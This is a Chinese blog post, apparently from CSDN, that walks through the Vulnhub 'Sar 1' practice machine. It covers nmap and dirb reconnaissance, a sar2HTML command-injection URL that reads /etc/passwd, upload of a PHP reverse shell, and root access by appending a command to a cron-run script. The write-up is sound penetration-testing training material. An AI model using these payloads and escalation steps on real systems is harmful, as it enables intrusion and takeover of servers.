Vulnhub-靶机-Sar 1

最新推荐文章于 2024-02-28 17:58:40 发布
最新推荐文章于 2024-02-28 17:58:40 发布
阅读量1.1k 收藏 4
点赞数 2
分类专栏: Vulnhub-靶机 文章标签: shell 靶机 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/113248579
版权

Vulnhub—靶机—Sar 1

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/sar-1,425/

文章目录

一、信息收集

【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.110.0/24
在这里插入图片描述

【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.110.131
在这里插入图片描述

【步骤三】对80端口进行目录枚举
【命令】dirb http://192.168.110.131
在这里插入图片描述

【步骤四】依次查看目录内容
【命令】http://192.168.110.130:8080/debug
【分析】在robots文件发现了一个东西,尝试做为目录进行访问
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、漏洞利用

【步骤五】发现这是一个web页面带有版本序列号,去查询版本是否有漏洞存在
在这里插入图片描述

【步骤六】发现当前版本存在远程命令执行漏洞,对漏洞进行利用
【命令】URLIP/sar2HTML/index.php?plot=;cat /etc/passwd
在这里插入图片描述
【步骤七】继续查看页面发现文件上传功能,尝试上传shell脚本
【命令】上传后路径:192.168.110.131/sar2HTML/sarDATA/uPLOAD/php-reverse-shell.php
【分析】kali上监听本地443端口,访问上传后的地址
在这里插入图片描述
【步骤八】查看计划任务
【分析】发现有一条使用sudo执行的脚本,尝试使用计划任务提权 cat /etc/crontab
在这里插入图片描述
【步骤九】查看执行的文件发现内部又利用bin/bash执行了目录下另一个文件
在这里插入图片描述

【步骤十】监听本地444端口,将phpshell的路径写入到write.sh文件,让其执行时调用执行
【命令】echo “php /var/www/html/sar2HTML/sarDATA/uPLOAD/shell.php” >> write.sh
在这里插入图片描述
在这里插入图片描述

三、Flag

【flag】66f93d6b2ca96c9ad78a8a9ba0008e99

夜白君
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sar1靶机练习
SYJ_361的博客
04-01 4848
本文通过kali渗透sar1靶机获得root权限,利用kali找到对应的模块,查看漏洞信息,构造payload下载文件,用蚁剑反弹shell,最终获得root权限
靶机练习之sar
qq_52360932的博客
04-01 4601
靶机练习之sar,学习笔记
Sar利用思路(vulnhub
Themanager112的博客
01-06 317
可供各位学习的同伴们在没有思路的时候查看,或者完善自己的思路,虽然自己的不算很好。
Vulnhub靶机SAR_ 1
LainWith的博客
08-20 214
Sar(此系列共1台)发布日期:2020 年 2 月 15 日难度:初级运行环境:VMware目标:取得Root权限nmap漏扫脚本目录爆破远程代码执行计划任务提权。
vulnhub Sar: 1
箭雨镜屋
05-04 1234
渗透思路:nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2085
前言 这次练习的靶机vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
vulnhub:Sar
cjstang的博客
06-16 764
OSCP-2:这次练习的靶机vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力                                                                                                                                                                                     感谢浏览 目录   一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
【学渗透靶机——sar 1】
jieli0901227的博客
06-20 545
主机漏洞扫描完成,这台靶机只开放了80 端口,通过nmap l漏洞扫描发现有robots.txt 和phpinfo.php 两个文件。切换到目录、var/www/html下 查看finally.sh ,这个脚本调用了write.sh ,robots 这个文件是方式爬虫爬取网站的,那么这个字符串有可能就是路径了,访问看看,80 端口默认页是一个apache服务的默认页面,没有什么特殊的地方。1、首先靶机主机ip发现, 端口扫描(),nmap 漏洞探测。那就好办了,,尝试利用下,镜像下来,打开看看。
vulnhub 靶机渗透:SAR: 1
Mysmycbx的博客
05-16 316
发现了robots.txt,打开发现sar2HTML,打开http://192.168.54.13/sar2HTML,发现是个工具,且告诉了版本号。可以root权限执行write.sh,但可以修改write.sh,那就修改为反弹shell。,既然是工具就可能存在漏洞,去searchsploit搜一下。发现执行成功了,那就说明该漏洞是存在的。然后静静地等待5分钟,就获取了root权限的反弹shell。发现有个root权限执行的定时任务,且5分钟执行一次。发现了2个且版本都是对应的,试试。
[VulnHub靶机渗透] Sar: 1
人若无名,便可专心练剑
02-07 962
靶机精讲 之 SARvulnhub靶机,盲打这台机器吧,老手测试一下宝刀,新手验证一下成长!标准的攻击链,却也需要你的腾挪躲闪。sar2html利用获得立足点,自动任务提权,很简单,但也未必打得很顺利,实战就是这样,大处的利用你要会,小的知识点、技能点也不能含糊。小试牛刀一下,you can do it!
[Write Up] SAR靶机练习
ccq86的博客
11-13 658
渗透测试靶机练习,sar靶机
靶机渗透之sar
最新发布
weixin_64267091的博客
02-28 1083
靶机渗透过程也就分为那几步骤,首先就是信息收集,找ip,端口,目录,漏洞。然后就进行漏洞分析,在进行漏洞分析的时候使用到了kali中自带的工具searchsploit,使用它搜索sar2HTML存在的漏洞,然后将漏洞利用脚本拷贝到本地,最后得知漏洞利用方式。最后就利用远程代码执行漏洞,上传反弹shell脚本,上传脚本一直出问题,也不知道为啥,最后上传了个shell.py,反弹成功。然后就是最后提权部分,利用了计划任务提权,获取root权限的关键是finally.sh脚本以root用户的权限来执行。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值